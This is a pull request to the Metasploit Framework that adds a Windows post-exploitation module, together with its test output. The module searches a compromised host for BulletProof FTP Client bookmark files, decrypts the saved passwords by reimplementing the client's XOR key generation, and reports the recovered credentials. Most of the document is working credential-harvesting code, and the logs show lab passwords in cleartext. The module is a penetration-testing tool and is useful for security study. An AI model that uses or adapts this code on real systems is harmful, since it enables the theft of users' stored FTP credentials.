### PR TITLE
Added post module for BulletProof FTP Client

### DIFF
--- a/modules/post/windows/gather/credentials/bulletproof_ftp.rb
+++ b/modules/post/windows/gather/credentials/bulletproof_ftp.rb
@@ -62,11 +62,13 @@ class Metasploit3 < Msf::Post
 		private
 
 		def low_dword(value)
-			return [value].pack("Q").unpack("VV")[0]
+			#return [value].pack("Q").unpack("VV")[0]
+			return Rex::Text.pack_int64le(value).unpack("VV")[0]
 		end
 
 		def high_dword(value)
-			return [value].pack("Q").unpack("VV")[1]
+			return Rex::Text.pack_int64le(value).unpack("VV")[1]
+			#return [value].pack("Q").unpack("VV")[1]
 		end
 
 		def low_byte(value)
@@ -143,6 +145,8 @@ class Metasploit3 < Msf::Post
 	def check_installation
 		bullet_reg = "HKCU\\SOFTWARE\\BulletProof Software"
 		bullet_reg_ver = registry_enumkeys("#{bullet_reg}")
+
+		return false if bullet_reg_ver.nil?
 
 		bullet_reg_ver.each { |key|
 			if key =~ /BulletProof FTP Client/
@@ -234,10 +238,11 @@ class Metasploit3 < Msf::Post
 
 		print_status("Searching BulletProof FTP Client installation directory...")
 		# BulletProof FTP Client 2.6 uses the installation dir to store bookmarks files
-		if not expand_path('%ProgramFiles(X86)%').empty? and expand_path('%ProgramFiles(X86)%') !~ /%ProgramFiles\(X86\)%/
-			program_files = expand_path('%PROGRAMFILES(X86)%') #x64
+		program_files_x86 = expand_path('%ProgramFiles(X86)%')
+		if not program_files_x86.empty? and program_files_x86 !~ /%ProgramFiles\(X86\)%/
+			program_files = program_files_x86 #x64
 		else
-			program_files = expand_path('%PROGRAMFILES%') #x86
+			program_files = expand_path('%ProgramFiles%') #x86
 		end
 		session.fs.dir.foreach(program_files) do |dir|
 			if dir =~ /BulletProof FTP Client/

--- a/modules/post/windows/gather/credentials/bulletproof_ftp.rb
+++ b/modules/post/windows/gather/credentials/bulletproof_ftp.rb
@@ -1,0 +1,303 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/file'
+require 'msf/core/post/windows/user_profiles'
+require 'msf/core/post/windows/registry'
+require 'msf/core/auxiliary/report'
+
+class Metasploit3 < Msf::Post
+
+	include Msf::Auxiliary::Report
+	include Msf::Post::File
+	include Msf::Post::Windows::UserProfiles
+	include Msf::Post::Windows::Registry
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'          => 'Windows Gather BulletProof FTP Client Saved Password Extraction',
+			'Description'   => %q{
+					This module extracts information from BulletProof FTP Bookmarks files and store
+				retrieved credentials in the database.
+			},
+			'License'       => MSF_LICENSE,
+			'Author'        => [ 'juan vazquez'],
+			'Platform'      => [ 'win' ],
+			'SessionTypes'  => [ 'meterpreter' ]
+		))
+	end
+
+	class BookmarksParser
+
+		# Array of entries found after parsing a Bookmarks File
+		attr_accessor :entries
+
+		def initialize(contents)
+			@xor_key = nil
+			@contents_bookmark = contents
+			@entries = []
+		end
+
+		def parse_bookmarks
+			begin
+				if not parse_header
+					return
+				end
+
+				while @contents_bookmark.length > 0
+					parse_entry
+					@contents_bookmark.slice!(0, 25) # 25 null bytes between entries
+				end
+			rescue
+				return
+			end
+		end
+
+		private
+
+		def low_dword(value)
+			return [value].pack("Q").unpack("VV")[0]
+		end
+
+		def high_dword(value)
+			return [value].pack("Q").unpack("VV")[1]
+		end
+
+		def low_byte(value)
+			return [value].pack("V").unpack("C*")[0]
+		end
+
+		def generate_xor_key
+			temp = @xor_key * 0x8088405
+			temp = low_dword(temp)
+			temp = temp + 1
+			@xor_key = temp
+			result = temp * 0x100
+			result = high_dword(result)
+			result = low_byte(result)
+			return result
+		end
+
+		def decrypt(encrypted)
+			length = encrypted.unpack("C")[0]
+			@xor_key = length
+			encrypted = encrypted[1..length]
+			decrypted = ""
+			encrypted.unpack("C*").each { |byte|
+				key = generate_xor_key
+				decrypted << [byte ^ key].pack("C")
+			}
+			return decrypted
+		end
+
+		def parse_object
+			begin
+				object_length = @contents_bookmark[0,1].unpack("C")[0]
+				object = @contents_bookmark[0, object_length + 1 ]
+				@contents_bookmark.slice!(0, object_length+1)
+				content = decrypt(object)
+				return content
+			rescue
+				return ""
+			end
+		end
+
+		def parse_entry
+			site_name = parse_object
+			site_address = parse_object
+			login = parse_object
+			remote_dir = parse_object
+			local_dir = parse_object
+			port = parse_object
+			password = parse_object
+
+			@entries << {
+				:site_name => site_name,
+				:site_address => site_address,
+				:login => login,
+				:remote_dir => remote_dir,
+				:local_dir => local_dir,
+				:port => port,
+				:password => password
+			}
+		end
+
+		def parse_header
+			signature = parse_object
+			if not signature.eql?("BPSitelist")
+				return false # Error!
+			end
+
+			@contents_bookmark.slice!(0, 4) # "\x01\x00\x00\x00"
+
+			return true
+		end
+	end
+
+	def check_installation
+		bullet_reg = "HKCU\\SOFTWARE\\BulletProof Software"
+		bullet_reg_ver = registry_enumkeys("#{bullet_reg}")
+
+		bullet_reg_ver.each { |key|
+			if key =~ /BulletProof FTP Client/
+				return true
+			end
+		}
+		return false
+	end
+
+	def get_bookmarks(path)
+
+		bookmarks = []
+
+		if not directory?(path)
+			return bookmarks
+		end
+
+		session.fs.dir.foreach(path) do |entry|
+			if directory?("#{path}\\#{entry}") and entry != "." and entry != ".."
+				bookmarks.concat(get_bookmarks("#{path}\\#{entry}"))
+			elsif entry =~ /bpftp.dat/ and file?("#{path}\\#{entry}")
+				vprint_good("BulletProof FTP Bookmark file found at #{path}\\#{entry}")
+				bookmarks << "#{path}\\#{entry}"
+			end
+		end
+		return bookmarks
+	end
+
+	def check_bulletproof(user_dir)
+		session.fs.dir.foreach(user_dir) do |dir|
+			if dir =~ /BulletProof Software/
+				vprint_status("BulletProof Data Directory found at #{user_dir}\\#{dir}")
+				return "#{user_dir}\\#{dir}"#"\\BulletProof FTP Client\\2010\\sites\\Bookmarks"
+			end
+		end
+		return nil
+	end
+
+	def report_findings(entries)
+
+		if session.db_record
+			source_id = session.db_record.id
+		else
+			source_id = nil
+		end
+
+		entries.each{ |entry|
+			@credentials << [
+				entry[:site_name],
+				entry[:site_address],
+				entry[:port],
+				entry[:login],
+				entry[:password],
+				entry[:remote_dir],
+				entry[:local_dir]
+			]
+
+			report_auth_info(
+				:host  => entry[:site_address],
+				:port => entry[:port],
+				:proto => 'tcp',
+				:sname => 'ftp',
+				:user => entry[:login],
+				:pass => entry[:password],
+				:ptype => 'password',
+				:source_id => source_id,
+				:source_type => "exploit"
+			)
+		}
+	end
+
+	def run
+
+		print_status("Checking if BulletProof FTP Client is installed...")
+		if not check_installation
+			print_error("BulletProof FTP Client isn't installed")
+			return
+		end
+
+		print_status("Searching BulletProof FTP Client Data directories...")
+		# BulletProof FTP Client 2010 uses User Local Settings to store bookmarks files
+		profiles = grab_user_profiles()
+		bullet_paths = []
+		profiles.each do |user|
+			next if user['LocalAppData'] == nil
+			bulletproof_dir = check_bulletproof(user['LocalAppData'])
+			bullet_paths << bulletproof_dir if bulletproof_dir
+		end
+
+		print_status("Searching BulletProof FTP Client installation directory...")
+		# BulletProof FTP Client 2.6 uses the installation dir to store bookmarks files
+		if not expand_path('%ProgramFiles(X86)%').empty? and expand_path('%ProgramFiles(X86)%') !~ /%ProgramFiles\(X86\)%/
+			program_files = expand_path('%PROGRAMFILES(X86)%') #x64
+		else
+			program_files = expand_path('%PROGRAMFILES%') #x86
+		end
+		session.fs.dir.foreach(program_files) do |dir|
+			if dir =~ /BulletProof FTP Client/
+				vprint_status("BulletProof Installation directory found at #{program_files}\\#{dir}")
+				bullet_paths << "#{program_files}\\#{dir}"
+			end
+		end
+
+		if bullet_paths.empty?
+			print_error("BulletProof FTP Client directories not found.")
+			return
+		end
+
+		print_status("Searching for BulletProof FTP Client Bookmarks files...")
+		bookmarks = []
+		bullet_paths.each { |path|
+			bookmarks.concat(get_bookmarks(path))
+		}
+		if bookmarks.empty?
+			print_error("BulletProof FTP Client Bookmarks files not found.")
+			return
+		end
+
+		print_status("Searching for connections data on BulletProof FTP Client Bookmarks files...")
+		entries = []
+		bookmarks.each { |bookmark|
+			p = BookmarksParser.new(read_file(bookmark))
+			p.parse_bookmarks
+			if p.entries.length > 0
+				entries.concat(p.entries)
+			else
+				vprint_error("Entries not found on #{bookmark}")
+			end
+		}
+
+		if entries.empty?
+			print_error("BulletProof FTP Client Bookmarks not found.")
+			return
+		end
+
+		# Report / Show findings
+		@credentials = Rex::Ui::Text::Table.new(
+			'Header'    => "BulletProof FTP Client Bookmarks",
+			'Indent'    => 1,
+			'Columns'   =>
+				[
+					"Site Name",
+					"Site Address",
+					"Port",
+					"Login",
+					"Password",
+					"Remote Dir",
+					"Local Dir"
+				])
+
+		report_findings(entries)
+		results = @credentials.to_s
+
+		print_line("\n" + results + "\n")
+
+	end
+
+end

--- a/modules/post/windows/gather/credentials/bulletproof_ftp.rb
+++ b/modules/post/windows/gather/credentials/bulletproof_ftp.rb
@@ -74,6 +74,13 @@ class Metasploit3 < Msf::Post
 		end
 
 		def generate_xor_key
+			# Magic numbers 0x100 and 0x8088405 is obtained from bpftpclient.exe static analysis:
+			#.text:007B13C1                 mov     eax, 100h
+			# ... later
+			#.text:0040381F                 imul    edx, dword_7EF008[ebx], 8088405h
+			#.text:00403829                 inc     edx
+			#.text:0040382A                 mov     dword_7EF008[ebx], edx
+			#.text:00403830                 mul     edx
 			temp = @xor_key * 0x8088405
 			temp = low_dword(temp)
 			temp = temp + 1

--- a/modules/post/windows/gather/credentials/bulletproof_ftp.rb
+++ b/modules/post/windows/gather/credentials/bulletproof_ftp.rb
@@ -62,13 +62,11 @@ class Metasploit3 < Msf::Post
 		private
 
 		def low_dword(value)
-			#return [value].pack("Q").unpack("VV")[0]
 			return Rex::Text.pack_int64le(value).unpack("VV")[0]
 		end
 
 		def high_dword(value)
 			return Rex::Text.pack_int64le(value).unpack("VV")[1]
-			#return [value].pack("Q").unpack("VV")[1]
 		end
 
 		def low_byte(value)


### PR DESCRIPTION
This module extracts information from BulletProof FTP Bookmarks files and store retrieved credentials in the database.

The module has been tested on BulletProof FTP Client 2.6, which can be downloaded from http://www.oldapps.com/download_old_version_BulletProof_ftp.php, and the last version available, BulletProof FTP Client 2010, which can be downloaded from the official home page (http://www.digitalcandle.com/).

In order to make use of the Bookmarks function, just uste the "Bookmarks" button available on the toolbar.
- The module has been tested on Windows 7:

<pre>
msf  exploit(handler) > use post/windows/gather/credentials/bulletproof_ftp 
msf  post(bulletproof_ftp) > set session 4
session => 4
msf  post(bulletproof_ftp) > set verbose true
everbose => true
xmsf  post(bulletproof_ftp) > exploit

[*] Checking if BulletProof FTP Client is installed...
[*] Searching BulletProof FTP Client Data directories...
[*] Searching BulletProof FTP Client installation directory...
[*] BulletProof Installation directory found at C:\Program Files\BulletProof FTP Client v2.6
[*] Searching for BulletProof FTP Client Bookmarks files...
[+] BulletProof FTP Bookmark file found at C:\Program Files\BulletProof FTP Client v2.6\sites\Main\bpftp.dat
[+] BulletProof FTP Bookmark file found at C:\Program Files\BulletProof FTP Client v2.6\sites\Main\test\bpftp.dat
[*] Searching for connections data on BulletProof FTP Client Bookmarks files...

BulletProof FTP Client Bookmarks
================================

 Site Name  Site Address  Port  Login  Password  Remote Dir  Local Dir
 ---------  ------------  ----  -----  --------  ----------  ---------
 site_name  192.168.1.4   21    login  password  remote_dir  initial_dir
 test2      192.168.3.2   222   login  password  remote_dir  initial_dir
msf  post(bulletproof_ftp) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
</pre>

- And windows XP SP3 / (database test)

<pre>
msf  exploit(handler) > use post/windows/gather/credentials/bulletproof_ftp 
msf  post(bulletproof_ftp) > set session 1
session => 1
msf  post(bulletproof_ftp) > run

[*] Checking if BulletProof FTP Client is installed...
[*] Searching BulletProof FTP Client Data directories...
[*] Searching BulletProof FTP Client installation directory...
[*] Searching for BulletProof FTP Client Bookmarks files...
[*] Searching for connections data on BulletProof FTP Client Bookmarks files...

BulletProof FTP Client Bookmarks
================================

 Site Name  Site Address   Port  Login  Password  Remote Dir  Local Dir
 ---------  ------------   ----  -----  --------  ----------  ---------
 site_name  192.168.1.1    21    login  password  bap         bap
 test       192.168.1.128  21    juan   juan                  
 test2      192.168.1.128  21    juan2  juan2                 
 test3      1.1.1.1        25    juan3  juan3     yap         yup
 test3      192.168.4.4    21    msf    msf3                  


[*] Post module execution completed
msf  post(bulletproof_ftp) > creds

Credentials
===========

host           port  user   pass      type      active?
----           ----  ----   ----      ----      -------
1.1.1.1        25    juan3  juan3     password  true
192.168.1.1    21    login  password  password  true
192.168.1.128  21    juan   juan      password  true
192.168.1.128  21    juan2  juan2     password  true
192.168.4.4    21    msf    msf3      password  true

[*] Found 5 credentials.
msf  post(bulletproof_ftp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32

</pre>


It's my first post module, so feedback is really welcome!! :-)
